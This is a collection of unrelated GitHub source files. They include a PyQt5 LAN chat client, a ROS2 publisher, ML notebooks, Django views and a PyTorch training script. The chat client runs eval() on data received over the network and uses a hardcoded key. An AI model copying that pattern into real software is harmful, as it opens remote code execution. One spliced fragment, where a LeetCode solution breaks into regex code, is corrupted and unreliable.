0\n\n        self.textB_MyIP.setText(get_my_lan_ip())\n\n        # record my own messages and the received text\n        self.ChatText = \"\"\n        self.ChatText_pre = get_my_lan_ip() + \"\\n(\" + socket.gethostname() + \")\" + \":\"\n\n        # group chat\n        self.MultiChatText = \"\"\n        self.MultiChatText_pre = get_my_lan_ip() + \"\\n(\" + socket.gethostname() + \")\" + \":\"\n\n        # my own private key and the peer's received public key\n        self.myAESKEY = random.sample(string.ascii_letters, 16)\n        self.myAESKEY = \"\".join(self.myAESKEY)\n        self.youAESKEY = \"1234567891111111\"\n        self.connections_keylist = {}\n        self.myECCKEY = 0\n\n    def receive_audio(self):\n        while self.is_receive_audio:\n            try:\n                data = self.s_audio.recv(1024)\n                print(type(data))\n                self.playing_stream.write(data)\n            except:\n                pass\n        print(\"The thread of receiver is killed\")\n\n    def send_audio(self):\n        while self.is_send_audio:\n            try:\n                data = self.recording_stream.read(1024)\n                self.s_audio.sendall(data)\n            except:\n                pass\n        print(\"The thread of sender is killed\")\n\n    def connect_to_server(self):\n        self.s_audio = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.s_control = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.s_text = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n 
self.s_file = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s_cert = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s_multi = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # print(self.textE_ServerIP.text())\n # while 1:\n try:\n self.target_ip = self.textE_ServerIP.text()\n self.target_audio_port = int(self.textE_AudioServerPort.text())\n self.s_audio.connect((self.target_ip, self.target_audio_port))\n\n # self.target_ip = self.textE_ServerIP.text()\n self.target_control_port = int(self.textE_ControlServerPort.text())\n self.s_control.connect((self.target_ip, self.target_control_port))\n\n # self.target_ip = self.textE_ServerIP.text()\n self.target_text_port = int(self.textE_TextServerPort.text())\n self.s_text.connect((self.target_ip, self.target_text_port))\n\n # self.target_ip = self.textE_ServerIP.text()\n self.target_file_port = int(self.textE_FileServerPort.text())\n self.s_file.connect((self.target_ip, self.target_file_port))\n\n self.target_cert_port = int(self.textE_CertServerPort.text())\n self.s_cert.connect((self.target_ip, self.target_cert_port))\n\n self.target_multi_port = int(self.textE_MultiChatPort.text())\n self.s_multi.connect((self.target_ip, self.target_multi_port))\n\n print(\"Connected to Server\")\n self.AudioInfoText += \"Connected to Server\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n self.is_connected = True\n self.is_receive_audio = True\n self.is_receive_text = True\n self.is_send_cert = True\n self.is_receive_file = True\n self.is_receive_multi_text = True\n\n # 发送公钥,留私钥,key[0]为私钥key,key[1]、key[2]为公钥KEY_X KEY_Y\n ip = get_my_lan_ip()\n ip = ip_str2int(ip)\n self.myECCKEY = get_key(ip)\n print(self.myECCKEY)\n self.s_control.send(str(ip).encode() + \" \".encode() + str(self.myECCKEY[1]).encode() + \" \".encode() + str(\n self.myECCKEY[2]).encode())\n\n # 开始接听\n self.playing_stream = self.p.open(format=self.audio_format, channels=self.channels, rate=self.rate,\n output=True,\n frames_per_buffer=self.chunk_size)\n receive_audio_thread = threading.Thread(target=self.receive_audio).start()\n receive_text_thread = threading.Thread(target=self.receive_text).start()\n send_cert_thread = threading.Thread(target=self.send_cert).start()\n receive_file_thread = threading.Thread(target=self.receive_file).start()\n receive_multi_text_thread = threading.Thread(target=self.receive_multi_text).start()\n\n # test\n # display_text_chat_thread = threading.Thread(target=self.display_text_chat).start()\n\n print(\"正在接听...\")\n self.AudioInfoText += \"正在接听...\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n\n # 接收ip\n # receive_ip_thread = threading.Thread(target=self.receive_server_ip).start()\n # break\n except:\n print(\"Couldn't connect to server\")\n self.AudioInfoText += \"Couldn't connect to server\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n # break\n\n def muti_send_offline_requirement(self, msg):\n i = 10\n while i > 0:\n i -= 1\n self.s_control.send(msg)\n\n def disconnect_to_server(self):\n if self.is_connected:\n # 发送给服务器,服务器删掉自己的socket\n # self.s_control.send(self.offline_requirement.encode())\n self.muti_send_offline_requirement(self.offline_requirement.encode())\n\n self.s_audio.close()\n self.s_text.close()\n self.s_control.close()\n self.s_file.close()\n self.s_cert.close()\n self.s_multi.close()\n\n print(\"Disconnected to Server\")\n self.AudioInfoText += \"Disconnected to Server\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n self.is_connected = False\n self.is_receive_audio = False\n 
self.is_send_audio = False\n self.is_receive_text = False\n self.is_send_cert = False\n self.is_receive_file = False\n self.is_receive_multi_text = False\n\n self.recording_stream = 0\n print(\"停止接听\")\n self.AudioInfoText += \"停止接听\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def start_audio(self):\n if self.is_connected:\n self.is_send_audio = True\n # 语音\n self.recording_stream = self.p.open(format=self.audio_format, channels=self.channels, rate=self.rate,\n input=True,\n frames_per_buffer=self.chunk_size)\n # print(self.p)\n # print(self.playing_stream)\n # print(self.recording_stream)\n # start threads\n send_audio_thread = threading.Thread(target=self.send_audio).start()\n\n print(\"正在语音通话...\")\n self.AudioInfoText += \"正在语音通话...\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def close_audio(self):\n if self.is_connected:\n self.is_send_audio = False\n # self.playing_stream = 0\n self.recording_stream = 0\n print(\"语音已关闭\")\n self.AudioInfoText += \"语音已关闭\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n # receive_thread = threading.Thread(target=self.receive_server_data)._delete()\n # send_thread = threading.Thread(target=self.send_data_to_server)._delete()\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def clear_info(self):\n self.AudioInfoText = \"\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n # 建立连接\n def build_connection(self):\n if self.is_connected:\n self.connect_ip_data = ip_str2int(self.textE_InputIP.text())\n self.s_cert.send(str(self.connect_ip_data).encode())\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def send_cert(self):\n while self.is_send_cert:\n try:\n recv_KEY = self.s_cert.recv(1024)\n recv_KEY = recv_KEY.decode()\n # print(recv_KEY)\n KEY_list = recv_KEY.split(\" \")\n # print(KEY_list)\n print(\"my keys\", self.myAESKEY, int(KEY_list[0]), int(KEY_list[1]))\n cert = ECC_encrypt(self.myAESKEY, int(KEY_list[0]), int(KEY_list[1]));\n print(\"str\" + str(cert))\n print(list(cert))\n\n self.s_cert.send(str(cert).encode())\n print(\"my cert send\")\n\n input_cert = self.s_cert.recv(1024)\n print(\"your cert recv\")\n\n input_cert = input_cert.decode()\n print(\"input_cert\", type(input_cert), input_cert)\n\n input_cert = eval(input_cert)\n print(\"input_cert\", type(input_cert), input_cert)\n\n self.youAESKEY = ECC_decrypt(self.myECCKEY[0], input_cert)\n print(\"youAESKEY\", self.youAESKEY)\n\n except:\n print(\"??\")\n\n # 控制信号:请求与Server绑定的ip\n # 开始扫描\n def start_to_scan(self):\n if self.is_connected:\n # self.control_info = \"a\"\n self.muti_send_offline_requirement(self.scan_requirement.encode())\n # self.s_control.send(self.scan_requirement.encode())\n self.receive_client_ip()\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def receive_client_ip(self):\n while True:\n try:\n recv_data = self.s_control.recv(1024)\n print(recv_data.decode())\n print(type(recv_data.decode()))\n self.textB_RecvIP.setText(recv_data.decode())\n print(\"!!!\")\n break\n except:\n pass\n # print(\"The thread of receiver is killed\")\n\n def send_text(self):\n if self.is_connected:\n 
current_time = get_time()\n send_text = \"[\" + current_time + \"]\" + self.ChatText_pre + self.textE_TextInput.toPlainText() + '\\n'\n self.ChatText += send_text\n self.textE_TextInput.setPlainText(\"\")\n self.textB_TextChat.setText(self.ChatText)\n send_text = encrypt(send_text, self.myAESKEY.encode('utf-8'))\n print(send_text)\n self.s_text.send(send_text)\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def receive_text(self):\n while self.is_receive_text:\n try:\n print(\"是否循环?\")\n recv_text = self.s_text.recv(1024)\n print(\"1\")\n print(recv_text.decode(), self.youAESKEY.encode('utf-8'))\n\n if self.youAESKEY == \"1234567891111111\":\n print(\"加密的信息,无法解密\")\n self.ChatText += \"加密的信息,无法解密\" + '\\n'\n print(self.ChatText)\n continue\n\n recv_text = decrypt(recv_text.decode(), self.youAESKEY.encode('utf-8'))\n print(\"2\")\n # print(recv_text)\n self.ChatText += recv_text\n print(\"3\")\n print(self.ChatText)\n # 这出问题了!!\n # 不能放到线程里\n # self.display_text_chat()\n # self.textB_TextChat.setText(self.ChatText)\n print(\"4\")\n except:\n print(\"??\")\n # finally:\n # self.textB_TextChat.setText(self.ChatText)\n\n def send_multi_text(self):\n if self.is_connected:\n current_time = get_time()\n send_text = \"[\" + current_time + \"]\" + self.MultiChatText_pre + self.textE_MultiTextInput.toPlainText() + '\\n'\n self.MultiChatText += send_text\n self.textE_MultiTextInput.setPlainText(\"\")\n self.textB_MultiTextChat.setText(self.MultiChatText)\n print(send_text)\n self.s_multi.send(send_text.encode())\n else:\n print(\"未连接服务器\")\n self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def receive_multi_text(self):\n while self.is_receive_multi_text:\n try:\n # print(\"是否循环?\")\n recv_text = self.s_multi.recv(1024)\n # print(\"1\")\n # print(recv_text.decode(), self.youAESKEY.encode('utf-8'))\n recv_text = recv_text.decode()\n self.MultiChatText += recv_text\n print(self.MultiChatText)\n # 这出问题了!!\n # 不能放到线程里\n # self.display_text_chat()\n # self.textB_TextChat.setText(self.ChatText)\n except:\n print(\"??\")\n # finally:\n # self.textB_TextChat.setText(self.ChatText)\n\n def display_text_chat(self):\n self.textB_TextChat.setText(self.ChatText)\n\n def receive_file(self):\n while self.is_receive_file:\n try:\n four_head_bytes = self.s_file.recv(4)\n # 接收报头字典的固定字节\n\n len_head_dic_json_bytes = struct.unpack(\"i\", four_head_bytes)[0]\n # 报头字典的字节数\n\n head_dic_json_bytes = self.s_file.recv(len_head_dic_json_bytes)\n # 接收报头字典字节\n\n head_dic = json.loads(head_dic_json_bytes.decode(\"utf-8\"))\n # 报头字典\n\n # print('head_dic:')\n # print(head_dic)\n suffix = head_dic['suffix']\n\n recv_size = 0\n recv_data = b''\n while recv_size < head_dic['total_size']:\n part_data = self.s_file.recv(1024)\n recv_data += part_data\n recv_size += len(part_data)\n print(part_data)\n\n print('接收文件')\n file_path = self.testE_FilePath.text()\n path = str(file_path) + '\\\\' + time.strftime(\"%Y%m%d%H%M%S\", time.localtime()) + suffix\n # path = r'C:\\Users\\0w0\\Desktop\\recv_test' + '\\\\' + time.strftime(\"%Y%m%d%H%M%S\", time.localtime()) + suffix\n\n with open(path, 'wb') as f:\n f.write(recv_data)\n except:\n print(\"??\")\n\n def send_file_action(self):\n if self.is_connected:\n file_name = self.select_file()\n if file_name is None:\n return\n print(file_name)\n threading.Thread(target=self.send_file, args=(file_name,)).start()\n # self.send_file(file_name)\n else:\n print(\"未连接服务器\")\n 
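# The file transfer above uses a classic length-prefixed header protocol: a 4-byte
# struct-packed int giving the size of a JSON header, then the header, then the raw
# payload. One caveat: socket.recv(n) may return fewer than n bytes, so production code
# reads in a loop. A self-contained sketch of the header round-trip (no sockets):
import json
import struct

def pack_message(payload: bytes, suffix: str) -> bytes:
    header = json.dumps({'suffix': suffix, 'total_size': len(payload)}).encode('utf-8')
    return struct.pack('i', len(header)) + header + payload

def unpack_message(blob: bytes):
    (header_len,) = struct.unpack('i', blob[:4])          # fixed-size length prefix
    header = json.loads(blob[4:4 + header_len].decode('utf-8'))
    payload = blob[4 + header_len:4 + header_len + header['total_size']]
    return header, payload

header, payload = unpack_message(pack_message(b'hello', '.txt'))
assert header['suffix'] == '.txt' and payload == b'hello'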
self.AudioInfoText += \"未连接服务器\\n\"\n self.textB_AudioInfo.setText(self.AudioInfoText)\n\n def select_file(self):\n r = QFileDialog.getOpenFileName(self, \"选择您想要传输的文件\", \"~/\")\n return r[0]\n\n def read_content(self, path):\n f = open(path, 'rb')\n suffix = pathlib.Path(path).suffix\n return f.read(), suffix\n\n def send_file(self, file_path):\n # file_path = r'C:\\Users\\Yyd的YOGA 14s\\Desktop\\证件照.jpg'\n data, suffix = self.read_content(file_path)\n total_size = len(data)\n\n head_dic = {'suffix': suffix, 'total_size': total_size}\n # 报头字典\n\n head_dic_json_bytes = json.dumps(head_dic).encode(\"utf-8\")\n # 报头字典str然后转字节\n\n len_head_dic_json_bytes = len(head_dic_json_bytes)\n # 报头字典str字节数\n print(len_head_dic_json_bytes)\n four_head_bytes = struct.pack(\"i\", len_head_dic_json_bytes)\n # 制作报头字典字节int的固定字节数\n\n self.s_file.send(four_head_bytes)\n # 发送报头字典字节int的固定字节数\n\n self.s_file.send(head_dic_json_bytes)\n # 发送报头字典\n\n self.s_file.send(data)\n # print(data)\n # SendFileThread(file_path, self.s_file).start()\n\n def refresh_chat_box(self):\n self.textB_TextChat.setText(self.ChatText)\n\n def refresh_multi_chat_box(self):\n self.textB_MultiTextChat.setText(self.MultiChatText)\n\n# if __name__ == '__main__':\n# client = Client()\n","repo_name":"ChenVoid/QuickChat-PyQT5-LAN","sub_path":"QuickChat_Client/AudioChat/AudioClient.py","file_name":"AudioClient.py","file_ext":"py","file_size_in_byte":20259,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"15940082661","text":"import rclpy\nimport sys\n\nfrom rclpy.qos import qos_profile_system_default\nfrom rclpy.qos import qos_profile_sensor_data\n\nfrom .publisher import NumPublisher, StrPublisher, NumUnboundedArrayPublisher\n\n\nPUB_TYPE_IDX = 1\nQOS_TYPE_IDX = 2\n\n\ndef publisherFactory(pub: str, period: int, qos: int):\n if qos == '0':\n qos = qos_profile_system_default\n elif qos == '1':\n qos = qos_profile_sensor_data\n\n if pub == 'num':\n return NumPublisher(period, qos)\n elif pub == 'num_array':\n return NumUnboundedArrayPublisher(period, qos)\n elif pub == 'str':\n return StrPublisher(period, qos)\n\n\ndef main(args=None):\n time_period = 0.5\n pub_type = 'num'\n qos_type = 0\n if len(sys.argv) == 3: # vulnerable here\n pub_type = sys.argv[PUB_TYPE_IDX]\n qos_type= sys.argv[QOS_TYPE_IDX]\n\n rclpy.init(args=args)\n publisher = publisherFactory(pub=pub_type, period=time_period, qos=qos_type)\n rclpy.spin(publisher)\n publisher.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"flyotlin/ros2-dds-experiment","sub_path":"simple_pubsub/experiment_pubsub/publisher_function.py","file_name":"publisher_function.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1335564163","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport os\n\n\n# In[2]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[3]:\n\n\nfrom sklearn.preprocessing import StandardScaler\n\n\n# In[4]:\n\n\nfrom sklearn.tree import DecisionTreeClassifier as dtree\n\n\n# In[5]:\n\n\nfrom sklearn.tree import export_graphviz\n\n\n# In[6]:\n\n\nfrom sklearn.datasets import load_iris\n\n\n# In[8]:\n\n\nfrom sklearn.tree import plot_tree\nimport matplotlib.pyplot as plt\n\n\n# In[9]:\n\n\nimport seaborn as sns\n\n\n# In[10]:\n\n\ndf = pd.read_csv(\"C:\\\\Users\\\\loket\\\\Downloads\\\\archive 
(1)\\\\income_evaluation.csv\")\n\n\n# In[12]:\n\n\ndf.head()\n\n\n# In[13]:\n\n\ndf.columns = list(map(lambda a: a.lstrip(), df.columns))\n\n\n# In[14]:\n\n\ndf.isnull().sum()\n\n\n# In[15]:\n\n\ndf.shape\n\n\n# In[16]:\n\n\ndf['workclass'].value_counts()\n\n\n# In[17]:\n\n\nshape0 = df.shape[0]\nfor column in df.columns:\n df[column].replace(' ?', np.NaN, inplace=True)\ndf = df.dropna().reset_index().drop(columns=['index'])\nshape1 = df.shape[0]\nprint(str(shape0 - shape1) + ' rows have been removed.')\n\n\n# In[18]:\n\n\nincome = df.income.value_counts()\nincome\n\n\n# In[19]:\n\n\ncolors = ['#ADEFD1FF', '#00203FFF']\nexplode = [0, 0.1]\nplt.pie(income, labels=income.values, colors=colors, explode = explode, shadow=True)\nplt.title('Income distribution')\nplt.legend(labels=income.index)\n\n\n# In[20]:\n\n\ndf['income'].replace([' <=50K',' >50K'],[1,0], inplace=True)\n\n\n# In[21]:\n\n\ndf.dtypes\n\n\n# In[22]:\n\n\nstats = df.select_dtypes(['float', 'int64']).drop(columns=['income'])\n\n\n# In[23]:\n\n\nsns.heatmap(df.corr(), annot=True).set_title('Correlation Factors Heat Map', color='black', size='20')\n\n\n# In[24]:\n\n\ndf_final = pd.get_dummies(df)\ndf_final.head()\n\n\n# In[25]:\n\n\nX = df_final.drop(columns=['income'])\ny = df_final['income']\n\n\n# In[26]:\n\n\nss = StandardScaler()\nss.fit(X)\nX = ss.transform(X)\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n\n\n# In[27]:\n\n\nct = dtree(\n criterion=\"entropy\", # Alternative 'entropy'\n max_depth=None # Alternative, specify an integer\n # 'None' means full tree till single leaf\n )\n\n\n# In[28]:\n\n\n_=ct.fit(X_train,y_train)\n\n\n# In[29]:\n\n\ny_te = ct.predict(X_test)\nnp.sum((y_test == y_te))/y_test.size\n\n\n# In[30]:\n\n\nfi = ct.feature_importances_\nfi\n\n\n# In[31]:\n\n\nlist(zip(df.columns, fi))\n\n\n# In[32]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier \n\n\n# In[33]:\n\n\nclf=RandomForestClassifier(n_estimators=100)\n\n\n# In[34]:\n\n\nclf.fit(X_train,y_train)\n\ny_pred=clf.predict(X_test)\n\n\n# In[35]:\n\n\nfrom sklearn import metrics\nprint(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"AkshayVashistha/MLP","sub_path":"income evaluation .py","file_name":"income evaluation .py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9237791636","text":"class Solution:\n def minOperations(self, nums: List[int]) -> int:\n n=len(nums)\n ans=n\n nums=sorted(set(nums))\n r=0\n for l in range(len(nums)):\n while r(.*?)',\n self.html)\n refs = re.findall(r'(.*?)',\n self.html, re.DOTALL)\n return titles, description, refs\n\n def get_time(self):\n \"\"\"\n :return: время статей\n \"\"\"\n time = self.data.find_all('span', {'class': \"item__info\"})\n return time\n\n def get_paragraphs(self):\n '''\n :return: текст статьи\n '''\n paragraphs = self.data.find_all('p')\n text = ''\n for i in paragraphs:\n text += i.text\n return text\n\n def get_tags(self):\n \"\"\"\n :return: теги\n \"\"\"\n tags = self.data.find_all('a', {'class': \"article__tags__link\"})\n return tags\n","repo_name":"corwinnn/myBot","sub_path":"myParser.py","file_name":"myParser.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36030006058","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom newsApp.models import news\n\ndef 
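# The minOperations record above is garbled: an HTML-tag-stripping pass appears to have
# eaten everything from the "while r<..." comparison up to a ">" inside the next record's
# regexes, fusing two files; the destroyed bytes are unrecoverable. The intact prefix
# matches the standard sliding-window solution to "minimum operations to make the array
# continuous", so a plausible reconstruction of the missing tail looks like this:
from typing import List

class Solution:
    def minOperations(self, nums: List[int]) -> int:
        n = len(nums)
        ans = n
        nums = sorted(set(nums))
        r = 0
        for l in range(len(nums)):
            # grow the window while values still fit inside [nums[l], nums[l] + n - 1]
            while r < len(nums) and nums[r] < nums[l] + n:
                r += 1
            ans = min(ans, n - (r - l))  # elements outside the window must be replaced
        return ans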
table(request):\n title = request.GET['title']\n sdate = request.GET['sdate']\n tdate = request.GET['tdate']\n preType = request.GET.getlist('type')\n order = int(request.GET['order'])\n type = [int(x) for x in preType]\n info = news.objects.filter(title__icontains=title, type__in=type, date__gte=sdate, date__lte=tdate)\n\n if order == 0:\n info = info.order_by('-date')\n else:\n info = info.order_by('date')\n\n return render(request, 'table.html', {'data': info})\n\ndef tableAll(request):\n info=news.objects.all()\n return render(request,'table.html',{'data':info})\n\ndef index(request):\n return render(request, 'index.html')","repo_name":"12mango/2019_backstage_group_assessment_archive","sub_path":"3/newsPlatform/newsApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37078387708","text":"def add(a,b):\n ans = a+b\n return(ans)\n\ndef sub(a,b):\n ans = a-b\n return(ans)\n \ndef mult(a,b):\n ans = a*b\n return(ans)\n \ndef div(a,b):\n ans = a/b\n return(ans)\n \ndef sqr(a):\n ans = a*a\n return(ans)\n \ndef rem(a,b):\n return (a%b)\n \ndef power(a,b):\n return (a**b)\n \ndef bid1(a):\n a = a*3\n a = a+4\n return (a)\n \ndef bid2(a):\n a = a+4\n a = a*3\n return (a)\n \nc = 7\nd = 5 \nprint(\"addition test\")\nprint(add(c,d))\nprint(\"subtraction test\")\nprint(sub(c,d))\nprint(\"Multiplication test\")\nprint(mult(c,d))\nprint(\"Square test\")\nprint(sqr(c))\nprint(\"Remainder test\")\nprint(rem(c,d))\nprint(\"Power test\")\nprint(power(c,d))\nprint(\"Bidmas test\")\nprint(bid1(c))\nprint(\"Bidmas test 2\")\nprint(bid2(c))\n\n\n \n","repo_name":"ams-bjones/arithmetic-model","sub_path":"arithmetic.py","file_name":"arithmetic.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"9331333699","text":"\"\"\"\nMain file for training and testing models on the image classification task.\n\"\"\"\n\nfrom __future__ import print_function\nimport comet_ml\nfrom comet_ml import Experiment\nimport argparse\nimport torch\n# import torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nimport os\nimport csv\nfrom pathlib import Path\nimport random\nimport numpy as np\nimport models\nfrom sklearn.externals import joblib\nfrom utils.ImageFolderWithPaths import ImageFolderWithPaths\n\ndef create_folder(newpath):\n \"\"\"\n Creates a folder in the file system at the specified path.\n \"\"\"\n if not os.path.exists(newpath):\n os.makedirs(newpath)\n print(\"created directory: \" + str(newpath))\n\ndef configure_arguments():\n \"\"\"\n Configures command line arguments for running this code file.\n \"\"\"\n parser = argparse.ArgumentParser(description='PyTorch Cat/Dog classification project')\n parser.add_argument('--batch_size', type=int, default=64, metavar='N',\n help='input batch size for training (default: 64)')\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\n help='input batch size for testing (default: 1000)')\n parser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.01, metavar='LR',\n help='learning rate (default: 0.01)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', 
type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n parser.add_argument('--saved-model-path', type=str, default=None,\n help='path of a saved model to load')\n parser.add_argument('--data_dir', type=str, default=None,\n help='root directory where datasets are stored.')\n parser.add_argument('--mode', type=str, default='train',\n choices=('train', 'test'))\n parser.add_argument('--model', type=str, default='BaseConvNet',\n choices=('BaseConvNet', 'ResNet', 'BaseConvNet2',\n 'BaseConvNet3', 'BaseConvNet4', 'ResNet1'),\n help='the model architecture to use during training')\n parser.add_argument('--aug-min-crop', type=float, default=0.08,\n help='the minimum crop scale fraction')\n\n args = parser.parse_args()\n return args\n\ndef create_dataloaders(args):\n \"\"\"\n Create pytorch data loaders for training, validation and test sets.\n Note that data must already be arranged in 2 sub-folders: 'trainset' and 'valset'.\n \"\"\"\n\n # Data loading code\n traindir = os.path.join(args.data_dir, 'trainset')\n valdir = os.path.join(args.data_dir, 'valset')\n testdir = os.path.join(args.data_dir, 'testset')\n normalize = transforms.Normalize(mean=[0.490, 0.455, 0.416],\n std=[0.252, 0.245, 0.247])\n\n train_dataset = datasets.ImageFolder(\n traindir,\n transforms.Compose([\n transforms.RandomResizedCrop(64, scale=(args.aug_min_crop,1.0)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ]))\n train_sampler = None\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size,\n shuffle=(train_sampler is None), sampler=train_sampler,\n num_workers=6)\n\n val_loader = torch.utils.data.DataLoader(\n ImageFolderWithPaths(valdir, transforms.Compose([\n #transforms.Resize(80),\n # transforms.CenterCrop(64),\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=args.test_batch_size, shuffle=False, num_workers=6)\n test_loader = torch.utils.data.DataLoader(\n ImageFolderWithPaths(testdir, transforms.Compose([\n #transforms.Resize(80),\n # transforms.CenterCrop(64),\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=args.test_batch_size, shuffle=False)\n\n return train_loader, val_loader, test_loader\n\ndef get_learning_rate(optimizer):\n for param_group in optimizer.param_groups:\n return param_group['lr']\n\ndef train(args, model, device, train_val_loaders, optimizer, experiment):\n train_loader, val_loader = train_val_loaders\n max_val_acc = 0\n val_acc = 0\n\n # load saved model, if any.\n if args.saved_model_path:\n model.load(args.saved_model_path)\n\n # set up learning rate scheduler\n # scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer,\n # mode='max', verbose=True, patience=10)\n # scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1)\n\n # train for all epochs\n cur_step = 0\n train_logs = []\n valid_logs = []\n for epoch in range(1, args.epochs + 1):\n # log current epoch number on comet\n experiment.log_current_epoch(epoch)\n\n correct = 0\n total = 0\n # train for all minibatches\n # scheduler.step(val_acc)\n # scheduler.step()\n for batch_idx, (data, target) in enumerate(train_loader):\n cur_step += 1\n\n model.train()\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n #loss = F.nll_loss(output, target)\n loss = F.cross_entropy(output, target)\n loss.backward()\n optimizer.step()\n\n # compute 
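# The val/test loaders above unpack (data, target, paths), so ImageFolderWithPaths must
# return the file path alongside each sample. A common minimal implementation of such a
# subclass; this is a sketch of the imported utility, not the project's exact code:
from torchvision import datasets

class ImageFolderWithPaths(datasets.ImageFolder):
    def __getitem__(self, index):
        img, target = super().__getitem__(index)
        path = self.imgs[index][0]  # self.imgs holds (path, class_index) tuples
        return img, target, path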
train accuracy\n            _, predicted = torch.max(output.data, 1)\n            total += target.size(0)\n            correct += (predicted == target.data).sum()\n            acc = 100. * correct / total\n\n            # log to comet.ml\n            experiment.log_metric(\"learning_rate\",\n                get_learning_rate(optimizer), step=cur_step)\n            experiment.log_metric(\"train_loss\", loss.item(), step=cur_step)\n            experiment.log_metric(\"train_accuracy\", acc.item(), step=cur_step)\n            train_logs.append((cur_step, acc.item(), loss.item()))\n\n            if batch_idx % args.log_interval == 0:\n                print('Train Epoch: {} of {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}\\tAccuracy: {:.6f}'.format(\n                    epoch, args.epochs, batch_idx * len(data), len(train_loader.dataset),\n                    100. * batch_idx / len(train_loader), loss.item(), acc.item()))\n\n        # evaluate on valid set and always keep copy of best model.\n        model.eval()\n        val_loss = 0\n        val_correct = 0\n        with torch.no_grad():\n            for data, target, paths in val_loader:\n                data, target = data.to(device), target.to(device)\n                output = model(data)\n                val_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n                pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n                val_correct += pred.eq(target.view_as(pred)).sum().item()\n\n        val_loss /= len(val_loader.dataset)\n        val_acc = 100. * val_correct / len(val_loader.dataset)\n\n        experiment.log_metric(\"validation_loss\", val_loss, step=cur_step)\n        experiment.log_metric(\"validation_accuracy\", val_acc, step=cur_step)\n        valid_logs.append((cur_step, val_acc, val_loss))\n\n        print('\\tValidation set: loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)'.format(\n            val_loss, val_correct, len(val_loader.dataset), val_acc))\n\n        # save best model\n        if val_acc > max_val_acc:\n            print(\"\\tsaving best model...\")\n            max_val_acc = val_acc\n            model_path = \"output/\" + args.model + \"/saved_model.pt\"\n            model.save(model_path)\n            experiment.log_asset(model_path, overwrite=True)\n    log_file_path = 'output/' + args.model + '/' + experiment.get_key() + '/logs.pkl'\n    joblib.dump((train_logs, valid_logs), log_file_path)\n    print('Training logs were written to: ', log_file_path)\n\n    return max_val_acc\n\ndef test(args, model, device, test_loader):\n\n    # load saved model, if any.\n    if args.saved_model_path:\n        print('Loading saved model...')\n        